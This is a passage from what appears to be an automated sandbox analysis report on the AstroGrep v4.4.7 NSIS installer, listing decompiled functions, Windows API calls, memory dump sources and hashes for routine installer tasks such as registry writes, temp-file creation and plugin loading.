				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405D51(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405D51(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D51(_t41, _t47, 0x429868, 0x429868, _a8);
				wsprintfA(_t32 + lstrlenA(0x429868), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				_t35 = SetDlgItemTextA( *0x42dbd8, _a4, 0x429868); // executed
				return _t35;
			}




















                                                                                                            0x0040470f
                                                                                                            0x00404714
                                                                                                            0x0040471c
                                                                                                            0x0040471d
                                                                                                            0x0040472a
                                                                                                            0x00404732
                                                                                                            0x00404733
                                                                                                            0x00404735
                                                                                                            0x00404737
                                                                                                            0x00404739
                                                                                                            0x0040473c
                                                                                                            0x0040473c
                                                                                                            0x00404743
                                                                                                            0x00404749
                                                                                                            0x00404749
                                                                                                            0x00404750
                                                                                                            0x00404757
                                                                                                            0x0040475a
                                                                                                            0x0040475d
                                                                                                            0x0040475d
                                                                                                            0x00404761
                                                                                                            0x00404771
                                                                                                            0x00404773
                                                                                                            0x00404776
                                                                                                            0x0040471f
                                                                                                            0x0040471f
                                                                                                            0x00404726
                                                                                                            0x00404726
                                                                                                            0x0040477e
                                                                                                            0x00404789
                                                                                                            0x0040479f
                                                                                                            0x004047af
                                                                                                            0x004047c2
                                                                                                            0x004047cb

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(AstroGrep v4.4.7 Setup ,AstroGrep v4.4.7 Setup ,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                            • wsprintfA.USER32 ref: 004047AF
                                                                                                            • SetDlgItemTextA.USER32 ref: 004047C2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$AstroGrep v4.4.7 Setup
                                                                                                            • API String ID: 3540041739-3341080892
                                                                                                            • Opcode ID: 935ee2909ce3d91a1e0ef8c8852d81f66e795bf13d31c63d3c36d76b3f3a4298
                                                                                                            • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                                                            • Opcode Fuzzy Hash: 935ee2909ce3d91a1e0ef8c8852d81f66e795bf13d31c63d3c36d76b3f3a4298
                                                                                                            • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402364, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E00402364(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				long _t22;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B2F(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A3A(2);
				_t18 = E00402A3A(0x11);
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x42e4b0 | 0x00000002, _t27, _t37 + 8, _t27); // executed
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A3A(0x23);
						_t19 = lstrlenA(0x409c10) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A1D(3);
						 *0x409c10 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E9F( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x409c10, 0xc00);
					}
					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x409c10, _t19); // executed
					if(_t22 == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey(); // executed
				}
				 *0x42e488 =  *0x42e488 +  *(_t37 - 4);
				return 0;
			}











                                                                                                            0x00402365
                                                                                                            0x0040236a
                                                                                                            0x00402374
                                                                                                            0x0040237e
                                                                                                            0x00402381
                                                                                                            0x0040239b
                                                                                                            0x004023a2
                                                                                                            0x004023aa
                                                                                                            0x004023b8
                                                                                                            0x004023bc
                                                                                                            0x004023c7
                                                                                                            0x004023c7
                                                                                                            0x004023cb
                                                                                                            0x004023cf
                                                                                                            0x004023d5
                                                                                                            0x004023da
                                                                                                            0x004023da
                                                                                                            0x004023de
                                                                                                            0x004023ea
                                                                                                            0x004023ea
                                                                                                            0x004023fb
                                                                                                            0x00402403
                                                                                                            0x00402405
                                                                                                            0x00402405
                                                                                                            0x00402408
                                                                                                            0x004024d8
                                                                                                            0x004024d8
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq211B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                            • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsq211B.tmp
                                                                                                            • API String ID: 1356686001-8733237
                                                                                                            • Opcode ID: 0b7ce92ed5109c362c2d34632f72a8d91888c561e4c423054677ea15aa728ce6
                                                                                                            • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                                            • Opcode Fuzzy Hash: 0b7ce92ed5109c362c2d34632f72a8d91888c561e4c423054677ea15aa728ce6
                                                                                                            • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004059D1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004059D1(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x4093ac; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                                                            0x004059d5
                                                                                                            0x004059db
                                                                                                            0x004059dc
                                                                                                            0x004059dc
                                                                                                            0x004059e1
                                                                                                            0x004059e2
                                                                                                            0x004059e5
                                                                                                            0x004059ef
                                                                                                            0x004059fc
                                                                                                            0x004059ff
                                                                                                            0x00405a07
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405a0b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405a0d
                                                                                                            0x00000000
                                                                                                            0x00405a0d
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 004059E5
                                                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                                            Strings
                                                                                                            • nsa, xrefs: 004059DC
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                                            • "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" , xrefs: 004059D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-23235572
                                                                                                            • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                            • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                                            • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                            • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 51%
                                                                                                            			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A1D(3);
				 *(_t55 + 8) = E00402A1D(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A3A(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A3A(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A3A();
					_t28 = E00402A3A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28); // executed
					goto L10;
				} else {
					_t52 = E00402A1D();
					_t37 = E00402A1D();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8)); // executed
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405C8D();
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                            0x00401bd3
                                                                                                            0x00401bdf
                                                                                                            0x00401be2
                                                                                                            0x00401beb
                                                                                                            0x00401beb
                                                                                                            0x00401bee
                                                                                                            0x00401bf2
                                                                                                            0x00401bfb
                                                                                                            0x00401bfb
                                                                                                            0x00401bfe
                                                                                                            0x00401c02
                                                                                                            0x00401c04
                                                                                                            0x00401c51
                                                                                                            0x00401c53
                                                                                                            0x00401c5c
                                                                                                            0x00401c64
                                                                                                            0x00401c67
                                                                                                            0x00401c67
                                                                                                            0x00401c70
                                                                                                            0x00000000
                                                                                                            0x00401c06
                                                                                                            0x00401c0d
                                                                                                            0x00401c0f
                                                                                                            0x00401c17
                                                                                                            0x00401c1a
                                                                                                            0x00401c42
                                                                                                            0x00401c76
                                                                                                            0x00401c76
                                                                                                            0x00401c1c
                                                                                                            0x00401c2a
                                                                                                            0x00401c32
                                                                                                            0x00401c35
                                                                                                            0x00401c35
                                                                                                            0x00401c1a
                                                                                                            0x00401c79
                                                                                                            0x00401c7c
                                                                                                            0x00401c82
                                                                                                            0x00402877
                                                                                                            0x00402877
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                            • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                                                            • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                            • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040588F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E0040588F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405D2F(0x42ac70, _a4);
				_t21 = E0040583A(0x42ac70);
				if(_t21 != 0) {
					E00405F9A(_t21);
					if(( *0x42e418 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42ac70;
						while(1) {
							_t11 = lstrlenA(0x42ac70);
							_push(0x42ac70);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00406033();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E004057E8(0x42ac70);
								continue;
							} else {
								goto L1;
							}
						}
						E004057A1();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                                            0x0040589b
                                                                                                            0x004058a6
                                                                                                            0x004058aa
                                                                                                            0x004058b1
                                                                                                            0x004058bd
                                                                                                            0x004058c9
                                                                                                            0x004058c9
                                                                                                            0x004058e1
                                                                                                            0x004058e2
                                                                                                            0x004058e9
                                                                                                            0x004058ea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004058cd
                                                                                                            0x004058d4
                                                                                                            0x004058dc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004058d4
                                                                                                            0x004058ec
                                                                                                            0x004058f2
                                                                                                            0x00000000
                                                                                                            0x00405900
                                                                                                            0x004058bf
                                                                                                            0x004058c3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004058c3
                                                                                                            0x004058ac
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                              • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,AstroGrep v4.4.7 Setup,NSIS Error), ref: 00405D3C
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                            • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                                                            • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 3248276644-3942820052
                                                                                                            • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                            • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                                                            • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                                                            • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401F90, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 60%
                                                                                                            			E00401F90(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42e4b8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42e488 =  *0x42e488 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A3A(0xfffffff0);
				 *(_t34 + 8) = E00402A3A(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F48(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40a814, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                            0x00401f90
                                                                                                            0x00401f90
                                                                                                            0x00401f95
                                                                                                            0x00401f9c
                                                                                                            0x00402057
                                                                                                            0x004021c4
                                                                                                            0x004021c4
                                                                                                            0x004028cf
                                                                                                            0x004028d2
                                                                                                            0x004028de
                                                                                                            0x004028de
                                                                                                            0x00401fab
                                                                                                            0x00401fb5
                                                                                                            0x00401fb8
                                                                                                            0x00401fc7
                                                                                                            0x00401fcb
                                                                                                            0x00401fd1
                                                                                                            0x00401fd5
                                                                                                            0x00402050
                                                                                                            0x00000000
                                                                                                            0x00402050
                                                                                                            0x00401fd7
                                                                                                            0x00401fe0
                                                                                                            0x00401fe4
                                                                                                            0x00402028
                                                                                                            0x00401fe6
                                                                                                            0x00401fe9
                                                                                                            0x00401fec
                                                                                                            0x0040201c
                                                                                                            0x00401fee
                                                                                                            0x00401ff1
                                                                                                            0x00401ffa
                                                                                                            0x00401ffc
                                                                                                            0x00401ffc
                                                                                                            0x00401ffa
                                                                                                            0x00401fec
                                                                                                            0x00402030
                                                                                                            0x00402045
                                                                                                            0x00402045
                                                                                                            0x00000000
                                                                                                            0x00402030
                                                                                                            0x00401fbb
                                                                                                            0x00401fc1
                                                                                                            0x00401fc5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00402FFA,00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30), ref: 00404FA4
                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\), ref: 00404FB6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                            • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2987980305-0
                                                                                                            • Opcode ID: f4ca77e5c23ce49f0fba9c01c572f22946ef00c7a097506d328bfac96287a1f7
                                                                                                            • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                                            • Opcode Fuzzy Hash: f4ca77e5c23ce49f0fba9c01c572f22946ef00c7a097506d328bfac96287a1f7
                                                                                                            • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A3A(0xfffffff0);
				_t13 = E0040583A(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004057CC(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E0040548B(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004054A8(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E0040540E(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405D2F("C:\\Program Files (x86)\\AstroGrep", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
